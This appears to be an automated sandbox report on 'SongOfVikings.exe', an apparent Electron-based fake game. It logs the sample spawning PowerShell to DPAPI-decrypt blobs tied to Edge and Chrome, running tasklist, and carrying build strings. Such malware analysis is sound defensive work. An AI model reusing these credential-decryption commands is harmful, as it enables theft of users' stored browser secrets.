Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')"	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1924 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --mojo-platform-channel-handle=2440 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:8	Jump to behavior
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Process created: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe "C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --user-data-dir="C:\Users\user\AppData\Roaming\SongOfVikings" --gpu-preferences=UAAAAAAAAADoAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAACQAAAAAAAAAAAAAAAAAAAAAAAAABgAAAAAAAAAGAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1904 --field-trial-handle=1932,i,8930845270246626881,144407894186871125,131072 --disable-features=SpareRendererForSitePerProcess,WinRetrieveSuggestionsOnlyOnDemand /prefetch:2	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\tasklist.exe tasklist
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,28,0,0,0,71,0,111,0,111,0,103,0,108,0,101,0,32,0,67,0,104,0,114,0,111,0,109,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,162,223,64,66,67,235,252,176,134,0,234,34,88,190,96,79,120,163,57,223,70,184,59,55,251,103,80,66,213,41,79,203,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,65,3,137,251,132,67,165,117,37,32,77,156,77,25,114,22,240,181,235,103,91,102,117,255,144,36,92,249,151,253,60,75,48,0,0,0,43,225,223,217,151,30,78,184,8,140,233,239,111,191,100,251,188,228,105,81,245,79,114,215,91,96,112,252,70,126,43,40,253,217,123,23,241,100,8,207,153,67,107,184,161,113,210,62,64,0,0,0,16,48,146,16,208,228,76,223,250,118,61,199,169,142,18,65,154,30,229,124,35,149,206,81,42,123,202,212,101,122,75,162,189,113,249,192,143,80,146,46,12,170,101,4,63,156,140,201,97,222,242,144,253,193,232,162,242,114,34,110,102,135,201,250), $null, 'CurrentUser')	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,236,112,27,63,29,45,147,76,154,28,167,163,109,166,140,139,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,177,111,46,150,212,157,15,4,228,252,12,0,1,183,251,108,66,54,253,189,23,124,86,207,222,56,201,250,182,152,221,247,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,178,13,225,93,214,215,151,162,72,143,194,133,190,22,214,149,170,149,74,147,55,106,15,180,131,73,196,197,128,118,103,89,48,0,0,0,94,206,242,8,29,35,27,71,101,58,135,55,188,69,108,246,46,232,119,93,65,217,99,7,252,165,33,164,119,40,187,209,190,181,221,12,22,110,211,109,137,129,98,159,150,234,140,244,64,0,0,0,160,185,210,147,25,143,46,73,184,87,79,38,71,228,189,220,249,51,245,132,106,162,213,227,45,47,24,171,45,48,70,50,96,105,2,105,84,9,7,23,200,91,89,93,224,1,154,41,99,254,68,168,144,46,197,126,233,182,158,66,11,216,163,157), $null, 'CurrentUser')

Source: C:\Users\user\Desktop\SongOfVikings.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Automated click: OK
Source: C:\Users\user\AppData\Local\Programs\SongOfVikings\SongOfVikings.exe	Automated click: OK

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\SongOfVikings.exe

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\cdf7078b-99f0-53cc-bffc-b945975ddd33

Jump to behavior

Source: SongOfVikings.exe

Static file information: File size 84118788 > 1048576

Source: SongOfVikings.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: BCC = $(NCC) -nologo -W3 -Fd$*.pdb $(CCOPTS) $(BCCOPTS) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\NODE_SQLITE3.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\NODE_SQLITE3.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: del /Q .exp .lo .ilk .lib .obj .ncb .pdb .sdf *.suo 2>NUL source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Dev\elevate\bin\x86\Release\Elevate.pdb source: SongOfVikings.exe, 00000000.00000003.1907116496.0000000006529000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: LTCOMPILE = $(TCC) -Fo$@ -Fd$*.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: CLEANFILES="$CLEANFILES .lib .dll .pdb .exp" source: SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /OUT:"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.NODE" /INCREMENTAL:NO /NOLOGO KERNEL32.LIB USER32.LIB GDI32.LIB WINSPOOL.LIB COMDLG32.LIB ADVAPI32.LIB SHELL32.LIB OLE32.LIB OLEAUT32.LIB UUID.LIB ODBC32.LIB DELAYIMP.LIB "C:\\USERS\\SERC\\.ELECTRON-GYP\\24.8.8\\X64\\NODE.LIB" DELAYIMP.LIB /DELAYLOAD:NODE.EXE /MANIFEST /MANIFESTUAC:"level='asInvoker' uiAccess='false'" /manifest:embed /DEBUG /PDB:"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\NODE_SQLITE3.PDB" /OPT:REF /OPT:ICF /TLBID:1 /DYNAMICBASE /NXCOMPAT /MACHINE:X64 /LTCG:INCREMENTAL /ignore:4199 /DLL RELEASE\OBJ\NODE_SQLITE3\WIN_DELAY_LOAD_HOOK.OBJ source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| *.dSYM ) ;; source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\ffmpeg.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1839965990.00000000051BD000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\libGLESv2.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1781445423.0000000006010000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBCMT.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\NODE-GYP\SRC\WIN_DELAY_LOAD_HOOK.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: SQLITE3EXEPDB = /pdb:sqlite3sh.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** rbu_file.pDb!=0, then it is assumed to already be present on the source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdb source: SongOfVikings.exe, 00000000.00000003.1839026693.00000000051B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: -FdC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: -typedil-fC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\node-gyp\src\win_delay_load_hook.cc-dos-Zi-Z7-W3-pdbrpc-Og-Ob2-Ot-EHs-MT-GS-Gy-FitObjFunc-FitObjData-NoRTTI-FoC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\deps\Release\obj\sqlite3\win_delay_load_hook.obj-FdC:\Users\serc\Desktop\Telegram - Kopya\x\script\node_modules\sqlite3\build\Release\sqlite3.pdb-errorreport:queue source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\electron.exe.pdb source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D3DCompiler_47.pdbGCTL source: SongOfVikings.exe, 00000000.00000003.1839026693.00000000051B7000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBVCRUNTIME.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: BCC = $(NCC) -nologo -W4 -Fd$*.pdb $(CCOPTS) $(BCCOPTS) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| .dSYM \| .o \| *.obj ) ;; source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: .$ac_ext \| .xcoff \| .tds \| .d \| .pdb \| .xSYM \| .bb \| .bbg \| .map \| .inf \| .dSYM \| .o \| *.obj ) source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1775044030.0000000005C10000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\projects\src\out\Default\vk_swiftshader.dll.pdb source: SongOfVikings.exe, 00000000.00000003.1836209062.0000000006010000.00000004.00001000.00020000.00000000.sdmp, SongOfVikings.exe, 00000000.00000003.1902908317.00000000051B1000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\BACKUP.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\BACKUP.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\STATEMENT.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\STATEMENT.CC source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ** for all file descriptors with rbu_file.pDb!=0. If the argument has source: SongOfVikings.exe, 00000000.00000003.1774844208.0000000005710000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: C:\PROGRAM FILES (X86)\MICROSOFT VISUAL STUDIO\2019\ENTERPRISE\VC\TOOLS\MSVC\14.29.30133\LIB\X64\LIBCPMT.AMD64.PDB source: SongOfVikings.exe, 00000000.00000003.1775248292.0000000006110000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: /c /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\INCLUDE\NODE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\SRC" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\CONFIG" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\OPENSSL\OPENSSL\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\UV\INCLUDE" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\ZLIB" /I"C:\USERS\SERC\.ELECTRON-GYP\24.8.8\DEPS\V8\INCLUDE" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\NODE_MODULES\NODE-ADDON-API" /I"C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\BUILD\RELEASE\OBJ\GLOBAL_INTERMEDIATE\SQLITE-AUTOCONF-3440200" /Z7 /nologo /W3 /WX- /diagnostics:column /Ox /Ob2 /Oi /Ot /Oy /GL /D NODE_GYP_MODULE_NAME=node_sqlite3 /D USING_UV_SHARED=1 /D USING_V8_SHARED=1 /D V8_DEPRECATION_WARNINGS=1 /D V8_DEPRECATION_WARNINGS /D V8_IMMINENT_DEPRECATION_WARNINGS /D _GLIBCXX_USE_CXX11_ABI=1 /D ELECTRON_ENSURE_CONFIG_GYPI /D WIN32 /D _CRT_SECURE_NO_DEPRECATE /D _CRT_NONSTDC_NO_DEPRECATE /D _HAS_EXCEPTIONS=0 /D OPENSSL_NO_PINSHARED /D OPENSSL_THREADS /D NAPI_VERSION=8 /D NAPI_DISABLE_CPP_EXCEPTIONS=1 /D SQLITE_THREADSAFE=1 /D HAVE_USLEEP=1 /D SQLITE_ENABLE_FTS3 /D SQLITE_ENABLE_FTS4 /D SQLITE_ENABLE_FTS5 /D SQLITE_ENABLE_RTREE /D SQLITE_ENABLE_DBSTAT_VTAB=1 /D SQLITE_ENABLE_MATH_FUNCTIONS /D BUILDING_NODE_EXTENSION /D "HOST_BINARY=\"node.exe\"" /D NDEBUG /D _WINDLL /GF /Gm- /EHsc /MT /GS /Gy /fp:precise /Zc:wchar_t /Zc:forScope /Zc:inline /GR- /Fo"RELEASE\OBJ\NODE_SQLITE3\\SRC\DATABASE.OBJ" /Fd"RELEASE\OBJ\NODE_SQLITE3\VC142.PDB" /external:W3 /Gd /TP /wd4351 /wd4355 /wd4800 /wd4251 /wd4275 /wd4244 /wd4267 /FC /Zc:__cplusplus -std:c++17 C:\USERS\SERC\DESKTOP\TELEGRAM - KOPYA\X\SCRIPT\NODE_MODULES\SQLITE3\SRC\DATABASE.CC source: 